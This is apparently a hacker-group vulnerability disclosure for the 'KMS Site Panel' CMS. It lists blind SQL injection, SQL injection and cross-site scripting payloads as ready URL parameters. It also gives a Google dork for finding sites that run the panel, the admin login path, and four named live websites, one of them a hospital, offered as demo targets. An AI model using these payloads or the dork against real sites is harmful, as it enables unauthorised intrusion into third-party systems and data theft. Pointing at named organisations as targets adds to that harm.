"KMS Site Panel multiple Vulnerability"
Author: alieye
E-mail: cseye_ut@yahoo.com
Vendor : http://www.mediasoft.ir/
Version: All version
class : remote
Google dork (lang=Farsi) : "طراحي و اجراي سايت: شركت رایان رسانه كیش"
We Are: Alieye , Z0d14c , Bully13 , Alichi & All Iranian Hackers
greetz: C.S.Eye Security Team members
Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com
----------------------------------------------------------------
Blind SQL Injection
1-/index.php?PageID=43-2+2*3-6
2-/index.php?ATPID=5&PSID=4-2+2*3-6
----------------------------------------------------------------
Cross Site Scripting
3-/index.php?ATPID=5&PSID=<ScRiPt >prompt(989309)</ScRiPt>&VID=5
4-input SearchText set to <ScRiPt >prompt(989309)</ScRiPt>
----------------------------------------------------------------
SQL injection
5-/index.php?ATPID=4'
6-/index.php?ATPID=4&PSID=2'
7-/index.php?PageID=45'
----------------------------------------------------------------
login page
http://site/CP/CP.php
----------------------------------------------------------------
demo website:
http://www.kish-hospital.com/
http://kishtourism.ir/
http://www.kishmalls.net/
http://www.shahrsazan.com/